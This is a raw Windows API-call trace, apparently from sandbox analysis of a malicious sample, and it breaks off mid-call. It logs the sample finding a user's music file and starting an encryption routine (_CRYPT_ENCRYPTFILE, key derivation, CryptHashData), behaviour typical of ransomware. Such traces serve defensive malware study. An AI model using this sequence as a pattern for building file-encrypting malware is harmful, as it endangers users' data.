(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.086] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0185.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.086] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.087] CloseHandle (hObject=0x138) returned 1 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0185.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.088] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.088] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0185.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0185.088] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0185.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.089] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0185.089] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.089] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0185.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.089] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0x90add8 [0185.090] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0x90add8 [0185.091] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LWhz.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.093] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0185.093] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="LWhz.m4a", cAlternateFileName="")) returned 0x90ae18 [0185.093] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.093] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.093] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0185.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.094] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0185.094] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.095] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.267] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.267] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.268] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0185.268] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0185.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.268] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0185.268] CharUpperBuffW (in: 